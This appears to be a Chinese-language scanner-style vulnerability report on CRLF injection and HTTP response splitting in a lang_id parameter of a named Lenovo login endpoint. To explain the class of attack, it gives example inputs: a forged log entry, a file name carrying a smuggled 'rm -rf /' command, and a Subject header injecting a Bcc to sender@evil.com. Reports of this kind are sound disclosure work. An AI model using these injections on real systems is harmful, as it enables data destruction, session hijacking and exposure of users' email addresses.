

簡(jiǎn)要描述:
它是一個(gè)遠(yuǎn)程攻擊者可能注入自定義HTTP標(biāo)頭。
攻擊者可以注入會(huì)話cookie或HTML代碼。
這可能進(jìn)行的XSS(跨站點(diǎn)腳本)或會(huì)話固定漏洞。
詳細(xì)說(shuō)明:
URL編碼的輸入lang_id設(shè)置SomeCustomInjectedHeader:injected_by_wvs
注入頭發(fā)現(xiàn):
SomeCustomInjectedHeader:injected_by_wvs
HTTP標(biāo)頭結(jié)構(gòu)“鍵:值”,其中每行由CRLF組合分離。
如果用戶輸入的值部分不正確轉(zhuǎn)義/刪除CRLF字符注入有可能改變了HTTP頭結(jié)構(gòu)。
HTTP響應(yīng)拆分是一個(gè)新的應(yīng)用程序的攻擊技術(shù),使各種新的攻擊,如Web緩存中毒,跨用戶涂改,劫持用戶的敏感信息和XSS的網(wǎng)頁(yè)。
攻擊者發(fā)送一個(gè)HTTP請(qǐng)求,迫使Web服務(wù)器,以形成一個(gè)輸出流,然后將其解釋為兩個(gè)HTTP響應(yīng),而不是一個(gè)響應(yīng)目標(biāo)。
攻擊者在搜索安全漏洞的時(shí)候沒(méi)有忽略很少使用的CRLF.攻擊者可以通過(guò)在一段數(shù)據(jù)中加入CRLF命令來(lái)改變接受這個(gè)數(shù)據(jù)的應(yīng)用程序處理這個(gè)數(shù)據(jù)的方式,從而執(zhí)行CFRL注入攻擊。
CRLF攻擊最基本的例子包括向記錄文件中增加偽造的記錄。也就是說(shuō),有安全漏洞的應(yīng)用程序把一個(gè)用戶輸入的內(nèi)容寫到系統(tǒng)記錄文件中。攻擊者可以提供如下輸入內(nèi)容:
Testing123MYSQL DATABASE ERROR:TABLE CORRUPTION
當(dāng)系統(tǒng)管理員在早上查看他的紀(jì)錄時(shí),他可能會(huì)用很多時(shí)間排除一個(gè)根本就不存在的故障。狡猾的攻擊者在攻擊系統(tǒng)的另一部分時(shí),可以使用這種特洛伊木馬分散管理員的注意力。
想像一下,一個(gè)應(yīng)用程序收到用戶輸入的一個(gè)文件名,然后對(duì)那個(gè)文件執(zhí)行一個(gè)指令,如“l(fā)s -a .”。如果這個(gè)應(yīng)用程序存在CRLF安全漏洞,攻擊者就可以輸入這樣的內(nèi)容:
File.txtrm -rf /
這個(gè)有安全漏洞的應(yīng)用程序就會(huì)執(zhí)行這個(gè)命令“l(fā)s -a File.txt”,然后再執(zhí)行這個(gè)命令“rm -rf /”。如果這個(gè)應(yīng)用程序是一個(gè)根程序,這可能就是它執(zhí)行的最后一個(gè)命令,因?yàn)樵诟謪^(qū)的全部文件都被刪除了。
考慮使用一種CRFL注入攻擊暴露使用一種基于網(wǎng)絡(luò)的匿名電子郵件系統(tǒng)的某個(gè)人的電子郵件地址。那個(gè)電子郵件系統(tǒng)的工作方式可能是這樣的:電子郵件的發(fā)送者用他們的電子郵件地址、信息主題和信息本身填寫一個(gè)表格。當(dāng)這個(gè)表格遞交到網(wǎng)絡(luò)服務(wù)器上的時(shí)候,網(wǎng)絡(luò)服務(wù)器把這個(gè)表格轉(zhuǎn)換為一個(gè)SMTP電子郵件,并且發(fā)送給收件人。發(fā)送者永遠(yuǎn)不會(huì)看到收件人的電子郵件地址。這個(gè)地址只有服務(wù)器知道。
如果這個(gè)應(yīng)用程序存在CRLF攻擊安全漏洞,電子郵件的發(fā)件人可以通過(guò)創(chuàng)建下面這樣的一行主題來(lái)破壞收件人的匿名性:
Subject:Peekaboo,I see youBcc:sender@evil.com
當(dāng)有安全漏洞的應(yīng)用程序得到這個(gè)數(shù)據(jù)的時(shí)候,它向這個(gè)郵件的文件頭增加一個(gè)不需要的行,創(chuàng)建一個(gè)發(fā)送到發(fā)件人郵件地址的這封郵件的盲送副本。在這個(gè)副本中,“To:”地址是看不到的,因此把收件人的郵件地址暴露給發(fā)送者。
漏洞證明:
http//ips.lenovo.com.cn/loginByPeopleAction.do
攻擊者可以注入會(huì)話Cookie或HTML代碼。這種行為可能導(dǎo)致跨站腳本攻擊固定會(huì)話攻擊
問(wèn)題是否嚴(yán)重,請(qǐng)自行檢查,每一個(gè)細(xì)節(jié)都可能為攻擊者創(chuàng)造機(jī)會(huì)。